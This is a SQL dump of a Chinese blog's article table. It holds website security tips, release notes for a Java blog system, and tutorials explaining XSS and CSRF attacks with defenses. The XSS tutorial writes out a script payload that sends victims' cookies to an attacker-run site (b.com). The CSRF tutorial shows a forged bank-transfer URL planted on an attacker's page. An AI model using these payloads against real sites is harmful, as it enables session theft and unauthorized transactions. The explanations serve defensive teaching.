INSERT INTO `articles_content` VALUES ('15', '<p>任何东西不会只有优点没有缺点，开源程序也是一样的。选择开源程序做网站需要注意什么。</p><h2 id=\"ghost070\">密码安全：</h2><p>切忌不要使用开源程序初始密码和管理员用户名，这样被破解是很容易的。所以必须要提高密码的强度，最好用字母、数字，特殊符号全部组合起来的密码，安全系数会增大很多。</p><p><span style=\"color:#1f497d\"><strong>spring-core.xml</strong></span></p><p><br/></p><p><img src=\"http://img.s2m.cc/s2m/2015/09/17/6127a66e613e7c46da49988c3b34a614.png\" _src=\"http://img.s2m.cc/s2m/2015/09/17/6127a66e613e7c46da49988c3b34a614.png\"/></p><p><br/></p><p><span style=\"color:#1f497d\"><strong>log4j2.xml</strong></span></p><p><br/></p><p><img src=\"http://img.s2m.cc/s2m/2015/09/17/72af9f2caf9ba3dbdc7d1830a4dbd5e3.png\" _src=\"http://img.s2m.cc/s2m/2015/09/17/72af9f2caf9ba3dbdc7d1830a4dbd5e3.png\"/></p><p><br/></p><p><span style=\"color:#1f497d\"><strong>springmvc-servlet.xml</strong></span></p><p><br/></p><p><img src=\"http://img.s2m.cc/s2m/2015/09/17/54c0683f9f15010e0abf2589f9c3276a.png\" _src=\"http://img.s2m.cc/s2m/2015/09/17/54c0683f9f15010e0abf2589f9c3276a.png\"/></p><p><span style=\"color:#1f497d\"><strong><br/></strong></span></p><p><span style=\"color:#1f497d\"><strong>web.xml</strong></span></p><p><br/></p><p><img src=\"http://img.s2m.cc/s2m/2015/09/17/3efaa54fa4527600007351009e55705b.png\" _src=\"http://img.s2m.cc/s2m/2015/09/17/3efaa54fa4527600007351009e55705b.png\"/></p><h2 id=\"ghost070\">数据备份：</h2><p>定期做好数据备份是首要的安全防范，也是最重要的一条，所以现在迫不及待地要告诉大家。如果你的网站被黑了，或者是出现了严重的故障，这个备份就成了你的命根子，可以让你的网站在短时间内快速恢复，避免出现更大的损失。</p><h2 id=\"ghost070\">实时关注：</h2><p>个人的力量有限，而且互联网一日一变，所以有必要每天关注一下开源程序的官方网站，看它有没有发布更好的东西，或者下载一些最新的漏洞补丁，及时更新自己的网站程序。</p><h2 id=\"ghost070\">更改名称：</h2><p>永远不要让坏心眼的人扫描到你的开源程序类型，他会根据你的类型来对你的网站进行破坏。防范方法就是更改掉原来放开源程序的文件夹和文件的默认名称，这样那些人就无法扫描出来。</p><h2 id=\"ghost070\">检查漏洞：</h2><p>sql注入漏洞是无法避免的，而且这种漏洞很容易掌握，所以要主动采取措施来维护。可以从网上下载一些工具，然后根据视频教程来一步一步地学习怎样去防范。</p><h2 id=\"ghost070\">检查服务器：</h2><p>服务器是网站的核心力量，所以不能马虎。养成良好的习惯，定期地检查一下服务器的日志文件，看看是否有可疑的记录，比如有对非前台页面的访问，或者专门针对一个页面进行大量的IP访问。</p><h2 id=\"ghost070\">检查篡改：</h2><p>如果发现自己的网站文件被无故地增加或修改了，这样的篡改如果是有益的就不说了，一旦是恶性的篡改，估计带来的伤害会非常严重。经常检查是唯一的办法。</p><h2 id=\"ghost070\">正规下载：</h2><p>网站后台使用的下载或者上传工具一定要从正规的网站来下载，有必要的话，可以限制在服务器后台限制不必要的上传及下载，甚至关闭也行。</p><p>　　所有站长都把自己的网站当做孩子一样来呵护着，相信会做好开源程序的防范工作，开源程序做网站的注意事项也差不多到了很深的阶段，但是新人站长一定要做好上述一些最基本的注意事项。</p>');
INSERT INTO `articles_content` VALUES ('16', '<p>s2mBlog是基于JAVA的J2EE应用，采用 springMVC + mybatis + freemarker \r\n等框架搭建的一款高性能、MVC分离，简易的博客系统。集成了memcached 缓存架构，从安全性角度，可避免 \r\nXSS、CSRF等脚本攻击。同时，该博客系统也可作为新项目的原始框架进行二次开发。</p><p><br/></p><p>程序下载地址：<a title=\"本地下载\" target=\"_blank\" href=\"http://img.s2m.cc/s2m/release/s2mBlog-1.0.0.zip\">本地下载</a></p><p><br/></p><p>数据库脚本下载地址（后台默认用户名和密码都是&nbsp;admin）：<a title=\"数据库下载\" target=\"_blank\" href=\"http://img.s2m.cc/s2m/release/s2mBlog-1.0.0.sql\">本地下载</a></p><p><a title=\"本地下载\" target=\"_blank\" href=\"http://img.s2m.cc/s2m/release/s2mBlog-1.0.0.zip\"><br/></a></p><p>系统说明：<a title=\"关于 s2mBlog\" target=\"_blank\" href=\"http://www.s2m.cc/blog/about/\">关于 s2mBlog</a></p><p><br/></p>');
INSERT INTO `articles_content` VALUES ('17', '<p><img src=\"http://img.s2m.cc/s2m/2015/09/21/83197403990c0e68f71461cdffb13d24.png\" _src=\"http://img.s2m.cc/s2m/2015/09/21/83197403990c0e68f71461cdffb13d24.png\"/></p><p>新增评论功能，对留言内容进行 HTML&nbsp;和 JS&nbsp;转义处理，防止XSS攻击；</p><p>两次评论间隔1分钟，防止恶意评论；</p><p>提交评论通过&nbsp;token&nbsp;控制授权，无法简易模拟 POST&nbsp;请求进行提交，防止 CSRF&nbsp;攻击；</p><p>通过 Ajax&nbsp;提交数据，页面无刷新，友好的用户体验</p><p><img src=\"http://img.s2m.cc/s2m/2015/09/21/fe80baf88a4c1bf641478541e6349f6b.png\" _src=\"http://img.s2m.cc/s2m/2015/09/21/fe80baf88a4c1bf641478541e6349f6b.png\"/></p><p>恶意代码评论原样输出，杜绝恶意代码执行；</p><p>管理员支持针对评论进行回复；</p><p><img src=\"http://img.s2m.cc/s2m/2015/09/21/0a7da5686d51841a18e7afc57db9e627.png\" _src=\"http://img.s2m.cc/s2m/2015/09/21/0a7da5686d51841a18e7afc57db9e627.png\"/></p><p>博客右侧通过标签读取最新评论数据</p><p><img src=\"http://img.s2m.cc/s2m/2015/09/21/7707aaf2b55a01161dd52aaa3818225c.png\" _src=\"http://img.s2m.cc/s2m/2015/09/21/7707aaf2b55a01161dd52aaa3818225c.png\"/></p><p>后台评论管理界面截图<br/></p>');
INSERT INTO `articles_content` VALUES ('18', '<p>本文来自：高爽|Coder，原文地址：http://blog.csdn.net/ghsau/article/details/17027893</p><p>XSS又称CSS，全称Cross \r\nSiteScript，跨站脚本攻击，是Web程序中常见的漏洞，XSS属于被动式且用于客户端的攻击方式，所以容易被忽略其危害性。其原理是攻击者向有\r\nXSS漏洞的网站中输入(传入)恶意的HTML代码，当其它用户浏览该网站时，这段HTML代码会自动执行，从而达到攻击的目的。如，盗取用户\r\nCookie、破坏页面结构、重定向到其它网站等。</p><h1><a name=\"t0\" href=\"http://\"></a>XSS攻击</h1><p>&nbsp; &nbsp; &nbsp; &nbsp;XSS攻击类似于SQL注入攻击，攻击之前，我们先找到一个存在XSS漏洞的网站，XSS漏洞分为两种，一种是DOM Based XSS漏洞，另一种是Stored XSS漏洞。理论上，<strong>所有可输入的地方</strong>没有对输入数据进行处理的话，都会存在XSS漏洞，漏洞的危害取决于攻击代码的威力，攻击代码也不局限于script。</p><h2><a name=\"t1\" href=\"http://\"></a>DOM Based XSS</h2><p>&nbsp; &nbsp; &nbsp; &nbsp;DOM Based XSS是一种基于网页DOM结构的攻击，该攻击特点是中招的人是少数人。</p><p>&nbsp; &nbsp; &nbsp; &nbsp;<strong>场景一</strong>：</p><p>&nbsp; &nbsp; &nbsp; &nbsp;当我登录a.com后，我发现它的页面某些内容是根据url中的一个叫content参数直接显示的，猜测它测页面处理可能是这样，其它语言类似：&nbsp;</p><table style=\"background:#F2F2F2\" border=\"1\" cellpadding=\"0\" cellspacing=\"0\"><tbody><tr><td valign=\"top\"><p align=\"left\"><span style=\"color:#BF5F3F\">&lt;%@</span> <span style=\"color:#3F7F7F\">page</span> <span style=\"color:#7F007F\">language</span>=<em><span style=\"color:#2A00FF\">&quot;java&quot;</span></em><span style=\"color:#7F007F\">contentType</span>=<em><span style=\"color:#2A00FF\">&quot;text/html; charset=UTF-8&quot;</span></em><span style=\"color:#7F007F\">pageEncoding</span>=<em><span style=\"color:#2A00FF\">&quot;UTF-8&quot;</span></em><span style=\"color:#BF5F3F\">%&gt;</span></p><p align=\"left\"><span style=\"color:teal\">&lt;!</span><span style=\"color:#3F7F7F\">DOCTYPE</span><span style=\"color:teal\">html</span><span style=\"color:gray\">PUBLIC</span><span style=\"color:teal\">&quot;-//W3C//DTD HTML 4.01 Transitional//EN&quot;</span><span style=\"color:#3F7F5F\">&quot;http://www.w3.org/TR/html4/loose.dtd&quot;</span><span style=\"color:teal\">&gt;</span></p><p align=\"left\"><span style=\"color:teal\">&lt;</span><span style=\"color:#3F7F7F\">html</span><span style=\"color:teal\">&gt;</span></p><p align=\"left\">&nbsp;&nbsp;&nbsp; <span style=\"color:teal\">&lt;</span><span style=\"color:#3F7F7F\">head</span><span style=\"color:teal\">&gt;</span></p><p align=\"left\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <span style=\"color:teal\">&lt;</span><span style=\"color:#3F7F7F\">title</span><span style=\"color:teal\">&gt;</span>XSS测试<span style=\"color:teal\">&lt;/</span><span style=\"color:#3F7F7F\">title</span><span style=\"color:teal\">&gt;</span></p><p align=\"left\">&nbsp;&nbsp;&nbsp; <span style=\"color:teal\">&lt;/</span><span style=\"color:#3F7F7F\">head</span><span style=\"color:teal\">&gt;</span></p><p align=\"left\">&nbsp;&nbsp;&nbsp; <span style=\"color:teal\">&lt;</span><span style=\"color:#3F7F7F\">body</span><span style=\"color:teal\">&gt;</span></p><p align=\"left\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 页面内容：<span style=\"color:#BF5F3F\">&lt;%=</span>request.getParameter(<span style=\"color:#2A00FF\">&quot;content&quot;</span>)<span style=\"color:#BF5F3F\">%&gt;</span></p><p align=\"left\">&nbsp;&nbsp;&nbsp; <span style=\"color:teal\">&lt;/</span><span style=\"color:#3F7F7F\">body</span><span style=\"color:teal\">&gt;</span></p><p><span style=\"color:teal\">&lt;/</span><span style=\"color:#3F7F7F\">html</span><span style=\"color:teal\">&gt;</span></p></td></tr></tbody></table><p>&nbsp;\r\n &nbsp; &nbsp; \r\n我知道了Tom也注册了该网站，并且知道了他的邮箱(或者其它能接收信息的联系方式)，我做一个超链接发给他，超链接地址\r\n为：http://www.a.com?content=&lt;script&gt;\r\nwindow.open(“www.b.com?param=”+document.cookie)&lt;/script&gt;，当Tom点击这个链\r\n接的时候(假设他已经登录a.com)，浏览器就会直接打开b.com，并且把Tom在a.com中的cookie信息发送到b.com，b.com是我\r\n搭建的网站，当我的网站接收到该信息时，我就盗取了Tom在a.com的cookie信息，cookie信息中可能存有登录密码，攻击成功！这个过程中，\r\n受害者只有Tom自己。那当我在浏览器输入a.com?content=&lt;script&gt;alert(“xss”)&lt;/script&amp;\r\ngt;，浏览器展示页面内容的过程中，就会执行我的脚本，页面输出xss字样，这是攻击了我自己，那我如何攻击别人并且获利呢？</p><h2><a name=\"t2\" href=\"http://\"></a>Stored XSS</h2><p>&nbsp; &nbsp; &nbsp; &nbsp;Stored XSS是存储式XSS漏洞，由于其攻击代码已经存储到服务器上或者数据库中，所以受害者是很多人。</p><p>&nbsp; &nbsp; &nbsp; &nbsp;<strong>场景二</strong>：</p><p>&nbsp;\r\n &nbsp; &nbsp; \r\n&nbsp;a.com可以发文章，我登录后在a.com中发布了一篇文章，文章中包含了恶意代\r\n码，&lt;script&gt;window.open(“www.b.com?param=”+document.cookie)&lt;\r\n/script&gt;，保存文章。这时Tom和Jack看到了我发布的文章，当在查看我的文章时就都中招了，他们的cookie信息都发送到了我的服务\r\n器上，攻击成功！这个过程中，受害者是多个人。<br/>&nbsp; &nbsp; &nbsp; &nbsp;Stored XSS漏洞危害性更大，危害面更广。</p><h1><a name=\"t3\" href=\"http://\"></a>XSS防御</h1><p>&nbsp; &nbsp; &nbsp; &nbsp;我们是在一个矛盾的世界中，有矛就有盾。只要我们的代码中不存在漏洞，攻击者就无从下手，我们要做一个没有缝的蛋。XSS防御有如下方式。</p><h2><a name=\"t4\" href=\"http://\"></a>完善的过滤体系</h2><p>&nbsp; &nbsp; &nbsp; &nbsp;永远不相信用户的输入。需要对用户的输入进行处理，只允许输入合法的值，其它值一概过滤掉。</p><h2><a name=\"t5\" href=\"http://\"></a>Html encode</h2><p>&nbsp; &nbsp; &nbsp; &nbsp;假如某些情况下，我们不能对用户数据进行严格的过滤，那我们也需要对标签进行转换。</p><table style=\"background:#F2F9FF\" border=\"1\" cellpadding=\"0\" cellspacing=\"0\" width=\"675\"><tbody><tr><td valign=\"top\"><p align=\"left\"><span style=\"color:#2E2E2E\">less-than character (&lt;)</span></p></td><td valign=\"top\"><p align=\"left\"><span style=\"color:#2E2E2E\">&amp;lt;</span></p></td></tr><tr><td valign=\"top\"><p align=\"left\"><span style=\"color:#2E2E2E\">greater-than character (&gt;)</span></p></td><td valign=\"top\"><p align=\"left\"><span style=\"color:#2E2E2E\">&amp;gt;</span></p></td></tr><tr><td valign=\"top\"><p align=\"left\"><span style=\"color:#2E2E2E\">ampersand character (&amp;)</span></p></td><td valign=\"top\"><p align=\"left\"><span style=\"color:#2E2E2E\">&amp;amp;</span></p></td></tr><tr><td valign=\"top\"><p align=\"left\"><span style=\"color:#2E2E2E\">double-quote character (&quot;)</span></p></td><td valign=\"top\"><p align=\"left\"><span style=\"color:#2E2E2E\">&amp;quot;</span></p></td></tr><tr><td valign=\"top\"><p align=\"left\"><span style=\"color:#2E2E2E\">space character( )</span></p></td><td valign=\"top\"><p align=\"left\"><span style=\"color:#2E2E2E\">&amp;nbsp;</span></p></td></tr><tr><td valign=\"top\"><p align=\"left\"><span style=\"color:#2E2E2E\">Any ASCII code character whose code is greater-than or equal to 0x80</span></p></td><td valign=\"top\"><p align=\"left\"><span style=\"color:#2E2E2E\">&amp;#&lt;number&gt;, where &lt;number&gt; is the ASCII character value.</span></p></td></tr></tbody></table><p>&nbsp;\r\n &nbsp; \r\n&nbsp;&nbsp;比如用户输入：&lt;script&gt;window.location.href=”http://www.baidu.com”;&lt;\r\n/script&gt;，保存后最终存储的会是：&amp;lt;script&amp;gt;window.location.href=&amp;\r\nquot;http://www.baidu.com&amp;quot;&amp;lt;/script&amp;gt;在展现时浏览器会对这些字符转\r\n换成文本内容显示，而不是一段可执行的代码。</p><h1><a name=\"t6\" href=\"http://\"></a>其它</h1><div>&nbsp; &nbsp; &nbsp; &nbsp;下面提供两种Html encode的方法。</div><ul><li>使用Apache的commons-lang.jar<table border=\"1\" cellpadding=\"0\" cellspacing=\"0\"><tbody><tr><td valign=\"top\"><p align=\"left\">StringEscapeUtils.escapeHtml(str);// 汉字会转换成对应的ASCII码，空格不转换</p></td></tr></tbody></table></li></ul><p>自己实现转换，只转换部分字符</p><p align=\"left\"><strong><span style=\"color:#7F0055\">private</span> <span style=\"color:#7F0055\">static</span></strong> String htmlEncode(<strong><span style=\"color:#7F0055\">char</span></strong> c) {</p><p align=\"left\">&nbsp;&nbsp;&nbsp; <strong><span style=\"color:#7F0055\">switch</span></strong>(c) {</p><p align=\"left\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <strong><span style=\"color:#7F0055\">case</span></strong> <span style=\"color:#2A00FF\">&#39;&amp;&#39;</span>:</p><p align=\"left\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <strong><span style=\"color:#7F0055\">return</span></strong><span style=\"color:#2A00FF\">&quot;&amp;amp;&quot;</span>;</p><p align=\"left\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <strong><span style=\"color:#7F0055\">case</span></strong> <span style=\"color:#2A00FF\">&#39;&lt;&#39;</span>:</p><p align=\"left\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <strong><span style=\"color:#7F0055\">return</span></strong><span style=\"color:#2A00FF\">&quot;&amp;lt;&quot;</span>;</p><p align=\"left\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <strong><span style=\"color:#7F0055\">case</span></strong> <span style=\"color:#2A00FF\">&#39;&gt;&#39;</span>:</p><p align=\"left\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <strong><span style=\"color:#7F0055\">return</span></strong><span style=\"color:#2A00FF\">&quot;&amp;gt;&quot;</span>;</p><p align=\"left\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <strong><span style=\"color:#7F0055\">case</span></strong> <span style=\"color:#2A00FF\">&#39;&quot;&#39;</span>:</p><p align=\"left\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <strong><span style=\"color:#7F0055\">return</span></strong><span style=\"color:#2A00FF\">&quot;&amp;quot;&quot;</span>;</p><p align=\"left\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <strong><span style=\"color:#7F0055\">case</span></strong> <span style=\"color:#2A00FF\">&#39; &#39;</span>:</p><p align=\"left\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <strong><span style=\"color:#7F0055\">return</span></strong><span style=\"color:#2A00FF\">&quot;&amp;nbsp;&quot;</span>;</p><p align=\"left\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <strong><span style=\"color:#7F0055\">default</span></strong>:</p><p align=\"left\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <strong><span style=\"color:#7F0055\">return</span></strong> c +<span style=\"color:#2A00FF\">&quot;&quot;</span>;</p><p align=\"left\">&nbsp;&nbsp;&nbsp; }</p><p align=\"left\">}</p><p align=\"left\">&nbsp;</p><p align=\"left\"><span style=\"color:#3F5FBF\">/** </span><span style=\"color:#3F5FBF\">对传入的字符串</span><span style=\"text-decoration:underline;\"><span style=\"color:#3F5FBF\">str</span></span><span style=\"color:#3F5FBF\">进行</span><span style=\"text-decoration:underline;\"><span style=\"color:#3F5FBF\">Html</span></span><span style=\"color:#3F5FBF\"> encode</span><span style=\"color:#3F5FBF\">转换</span><span style=\"color:#3F5FBF\"> */</span></p><p align=\"left\"><strong><span style=\"color:#7F0055\">public</span> <span style=\"color:#7F0055\">static</span></strong> String htmlEncode(String str) {</p><p align=\"left\">&nbsp;&nbsp;&nbsp; <strong><span style=\"color:#7F0055\">if</span></strong>(str ==<strong><span style=\"color:#7F0055\">null</span></strong> || str.trim().equals(<span style=\"color:#2A00FF\">&quot;&quot;</span>))&nbsp;&nbsp;&nbsp;<strong><span style=\"color:#7F0055\">return</span></strong> str;</p><p align=\"left\">&nbsp;&nbsp;&nbsp; StringBuilder encodeStrBuilder = <strong><span style=\"color:#7F0055\">new</span></strong> StringBuilder();</p><p align=\"left\">&nbsp;&nbsp;&nbsp; <strong><span style=\"color:#7F0055\">for</span></strong> (<strong><span style=\"color:#7F0055\">int</span></strong> i = 0, len = str.length(); i &lt; len; i++) {</p><p align=\"left\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; encodeStrBuilder.append(<em>htmlEncode</em>(str.charAt(i)));</p><p align=\"left\">&nbsp;&nbsp;&nbsp; }</p><p align=\"left\">&nbsp;&nbsp;&nbsp; <strong><span style=\"color:#7F0055\">return</span></strong> encodeStrBuilder.toString();</p><p>}</p><p><br/></p>');
INSERT INTO `articles_content` VALUES ('19', '<p><strong>CSRF概念：</strong>CSRF跨站点请求伪造(Cross—Site Request Forgery)，跟XSS攻击一样，存在巨大的危害性，你可以这样来理解：<br/>攻击者盗用了你的身份，以你的名义发送恶意请求，对服务器来说这个请求是完全合法的，但是却完成了攻击者所期望的一个操作，比如以你的名义发送邮件、发消息，盗取你的账号，添加系统管理员，甚至于购买商品、虚拟货币转账等。&nbsp;如下：其中<span>Web A</span>为存在<span>CSRF</span>漏洞的网站，<span>Web B</span>为攻击者构建的恶意网站，<span>User C</span>为<span>Web A</span>网站的合法用户。<br/>&nbsp;<img style=\"display: block;margin-left: auto;margin-right: auto\" title=\"CSRF攻击介绍及防御\" src=\"http://www.phpddt.com/usr/uploads/2013/08/323678727.jpg\" alt=\"CSRF攻击介绍及防御\"/><strong>CSRF攻击攻击原理及过程如下：</strong><br/></p><p><span>1.&nbsp;</span>用户<span>C</span>打开浏览器，访问受信任网站<span>A</span>，输入用户名和密码请求登录网站<span>A</span>；</p><p><span>2.</span>在用户信息通过验证后，网站<span>A</span>产生<span>Cookie</span>信息并返回给浏览器，此时用户登录网站<span>A</span>成功，可以正常发送请求到网站<span>A</span>；</p><p><span>3.&nbsp;</span>用户未退出网站<span>A</span>之前，在同一浏览器中，打开一个<span>TAB</span>页访问网站<span>B</span>；</p><p><span>4.&nbsp;</span>网站<span>B</span>接收到用户请求后，返回一些攻击性代码，并发出一个请求要求访问第三方站点<span>A</span>；</p><p><br/> <span>5.&nbsp;</span>浏览器在接收到这些攻击性代码后，根据网站<span>B</span>的请求，在用户不知情的情况下携带<span>Cookie</span>信息，向网站<span>A</span>发出请求。网站<span>A</span>并不知道该请求其实是由<span>B</span>发起的，所以会根据用户<span>C</span>的<span>Cookie</span>信息以<span>C</span>的权限处理该请求，导致来自网站<span>B</span>的恶意代码被执行。&nbsp;<br/><strong>CSRF攻击实例：</strong><br/>受 害者 Bob 在银行有一笔存款，通过对银行的网站发送请求 &nbsp;http://bank.example/withdraw?account=bob&amp;amount=1000000&amp;for=bob2 &nbsp;可以使 Bob 把 1000000 的存款转到 bob2 的账号下。通常情况下，该请求发送到网站后，服务器会先验证该请求是否来自一个合法的 &nbsp;session，并且该 session 的用户 Bob 已经成功登陆。黑客 Mallory 自己在该银行也有账户，他知道上文中的 URL &nbsp;可以把钱进行转帐操作。Mallory &nbsp;可以自己发送一个请求给银行：http://bank.example/withdraw?account=bob&amp; amount=1000000&amp;for=Mallory。但是这个请求来自 Mallory 而非 &nbsp;Bob，他不能通过安全认证，因此该请求不会起作用。这时，Mallory 想到使用 CSRF &nbsp;的攻击方式，他先自己做一个网站，在网站中放入如下代码： &nbsp;src=”http://bank.example/withdraw?account=bob&amp;amount=1000000&amp;for=Mallory &nbsp;”，并且通过广告等诱使 Bob 来访问他的网站。当 Bob 访问该网站时，上述 url 就会从 Bob 的浏览器发向银行，而这个请求会附带 &nbsp;Bob 浏览器中的 cookie 一起发向银行服务器。大多数情况下，该请求会失败，因为他要求 Bob 的认证信息。但是，如果 Bob &nbsp;当时恰巧刚访问他的银行后不久，他的浏览器与银行网站之间的 session 尚未过期，浏览器的 cookie 之中含有 Bob &nbsp;的认证信息。这时，悲剧发生了，这个 url 请求就会得到响应，钱将从 Bob 的账号转移到 Mallory 的账号，而 Bob &nbsp;当时毫不知情。等以后 Bob &nbsp;发现账户钱少了，即使他去银行查询日志，他也只能发现确实有一个来自于他本人的合法请求转移了资金，没有任何被攻击的痕迹。而 Mallory &nbsp;则可以拿到钱后逍遥法外。&nbsp;<br/></p><p style=\";padding: 3px 0px 6px;line-height: 18px;font-family: Verdana, Geneva, sans-serif;font-size: 12px\"><strong>CSRF漏洞检测：</strong><span style=\"font-family: 宋体\"><br/></span>检测<span>CSRF</span>漏洞是一项比较繁琐的工作，最简单的方法就是抓取一个正常请求的数据包，去掉<span>Referer</span>字段后再重新提交，如果该提交还有效，那么基本上可以确定存在<span>CSRF</span>漏洞。</p><p>随着对<span>CSRF</span>漏洞研究的不断深入，不断涌现出一些专门针对<span>CSRF</span>漏洞进行检测的工具，如<span>CSRFTester</span>，<span>CSRF Request Builder</span>等。</p><p>以<span>CSRFTester</span>工具为例，<span>CSRF</span>漏洞检测工具的测试原理如下：使用<span>CSRFTester</span>进行测试时，首先需要抓取我们在浏览器中访问过的所有链接以及所有的表单等信息，然后通过在<span>CSRFTester</span>中修改相应的表单等信息，重新提交，这相当于一次伪造客户端请求。如果修改后的测试请求成功被网站服务器接受，则说明存在<span>CSRF</span>漏洞，当然此款工具也可以被用来进行<span>CSRF</span>攻击。</p><p><br/> <strong>防御CSRF攻击：</strong><br/></p><p>目前防御 CSRF 攻击主要有三种策略：验证 HTTP Referer 字段；在请求地址中添加 token 并验证；在 HTTP 头中自定义属性并验证。</p><p><strong></strong><strong>（1）验证 HTTP Referer 字段</strong></p><p>根 据 HTTP 协议，在 HTTP 头中有一个字段叫 Referer，它记录了该 HTTP &nbsp;请求的来源地址。在通常情况下，访问一个安全受限页面的请求来自于同一个网站，比如需要访问 &nbsp;http://bank.example/withdraw?account=bob&amp;amount=1000000&amp; for=Mallory，用户必须先登陆 bank.example，然后通过点击页面上的按钮来触发转账事件。这时，该转帐请求的 Referer &nbsp;值就会是转账按钮所在的页面的 URL，通常是以 bank.example 域名开头的地址。而如果黑客要对银行网站实施 CSRF &nbsp;攻击，他只能在他自己的网站构造请求，当用户通过黑客的网站发送请求到银行时，该请求的 Referer 是指向黑客自己的网站。因此，要防御 CSRF &nbsp;攻击，银行网站只需要对于每一个转账请求验证其 Referer 值，如果是以 bank.example &nbsp;开头的域名，则说明该请求是来自银行网站自己的请求，是合法的。如果 Referer 是其他网站的话，则有可能是黑客的 CSRF 攻击，拒绝该请求。</p><p>这 种方法的显而易见的好处就是简单易行，网站的普通开发人员不需要操心 CSRF 的漏洞，只需要在最后给所有安全敏感的请求统一增加一个拦截器来检查 &nbsp;Referer 的值就可以。特别是对于当前现有的系统，不需要改变当前系统的任何已有代码和逻辑，没有风险，非常便捷。</p><p>然而，这种方法并 非万无一失。Referer 的值是由浏览器提供的，虽然 HTTP 协议上有明确的要求，但是每个浏览器对于 Referer &nbsp;的具体实现可能有差别，并不能保证浏览器自身没有安全漏洞。使用验证 Referer &nbsp;值的方法，就是把安全性都依赖于第三方（即浏览器）来保障，从理论上来讲，这样并不安全。事实上，对于某些浏览器，比如 IE6 或 &nbsp;FF2，目前已经有一些方法可以篡改 Referer 值。如果 bank.example 网站支持 IE6 浏览器，黑客完全可以把用户浏览器的 &nbsp;Referer 值设为以 bank.example 域名开头的地址，这样就可以通过验证，从而进行 CSRF 攻击。</p><p>即便是使用最新的 浏览器，黑客无法篡改 Referer 值，这种方法仍然有问题。因为 Referer &nbsp;值会记录下用户的访问来源，有些用户认为这样会侵犯到他们自己的隐私权，特别是有些组织担心 Referer &nbsp;值会把组织内网中的某些信息泄露到外网中。因此，用户自己可以设置浏览器使其在发送请求时不再提供 &nbsp;Referer。当他们正常访问银行网站时，网站会因为请求没有 Referer 值而认为是 CSRF 攻击，拒绝合法用户的访问。</p><p><strong>（2）在请求地址中添加 token 并验证</strong></p><p>CSRF &nbsp;攻击之所以能够成功，是因为黑客可以完全伪造用户的请求，该请求中所有的用户验证信息都是存在于 cookie &nbsp;中，因此黑客可以在不知道这些验证信息的情况下直接利用用户自己的 cookie 来通过安全验证。要抵御 &nbsp;CSRF，关键在于在请求中放入黑客所不能伪造的信息，并且该信息不存在于 cookie 之中。可以在 HTTP &nbsp;请求中以参数的形式加入一个随机产生的 token，并在服务器端建立一个拦截器来验证这个 token，如果请求中没有 token 或者 token &nbsp;内容不正确，则认为可能是 CSRF 攻击而拒绝该请求。</p><p>这种方法要比检查 Referer 要安全一些，token &nbsp;可以在用户登陆后产生并放于 session 之中，然后在每次请求时把 token 从 session 中拿出，与请求中的 token &nbsp;进行比对，但这种方法的难点在于如何把 token 以参数的形式加入请求。对于 GET 请求，token 将附在请求地址之后，这样 URL 就变成 &nbsp;http://url?csrftoken=tokenvalue。 而对于 POST 请求来说，要在 form 的最后加上 &lt;input &nbsp;type=”hidden” name=”csrftoken” value=”tokenvalue”/&gt;，这样就把 token &nbsp;以参数的形式加入请求了。但是，在一个网站中，可以接受请求的地方非常多，要对于每一个请求都加上 token &nbsp;是很麻烦的，并且很容易漏掉，通常使用的方法就是在每次页面加载时，使用 javascript 遍历整个 dom 树，对于 dom 中所有的 a 和 &nbsp;form 标签后加入 token。这样可以解决大部分的请求，但是对于在页面加载之后动态生成的 html &nbsp;代码，这种方法就没有作用，还需要程序员在编码时手动添加 token。</p><p>该方法还有一个缺点是难以保证 token &nbsp;本身的安全。特别是在一些论坛之类支持用户自己发表内容的网站，黑客可以在上面发布自己个人网站的地址。由于系统也会在这个地址后面加上 &nbsp;token，黑客可以在自己的网站上得到这个 token，并马上就可以发动 CSRF 攻击。为了避免这一点，系统可以在添加 token &nbsp;的时候增加一个判断，如果这个链接是链到自己本站的，就在后面添加 token，如果是通向外网则不加。不过，即使这个 csrftoken &nbsp;不以参数的形式附加在请求之中，黑客的网站也同样可以通过 Referer 来得到这个 token 值以发动 CSRF &nbsp;攻击。这也是一些用户喜欢手动关闭浏览器 Referer 功能的原因。</p><p><strong>（3）在 HTTP 头中自定义属性并验证</strong></p><p>这 种方法也是使用 token 并进行验证，和上一种方法不同的是，这里并不是把 token 以参数的形式置于 HTTP 请求之中，而是把它放到 &nbsp;HTTP 头中自定义的属性里。通过 XMLHttpRequest 这个类，可以一次性给所有该类请求加上 csrftoken 这个 HTTP &nbsp;头属性，并把 token 值放入其中。这样解决了上种方法在请求中加入 token 的不便，同时，通过 XMLHttpRequest &nbsp;请求的地址不会被记录到浏览器的地址栏，也不用担心 token 会透过 Referer 泄露到其他网站中去。</p><p><br/> 然而这种方法的局限性非常大。XMLHttpRequest 请求通常用于 Ajax &nbsp;方法中对于页面局部的异步刷新，并非所有的请求都适合用这个类来发起，而且通过该类请求得到的页面不能被浏览器所记录下，从而进行前进，后退，刷新，收藏 等操作，给用户带来不便。另外，对于没有进行 CSRF 防护的遗留系统来说，要采用这种方法来进行防护，要把所有请求都改为 &nbsp;XMLHttpRequest 请求，这样几乎是要重写整个网站，这代价无疑是不能接受的。</p><p><br/></p>');
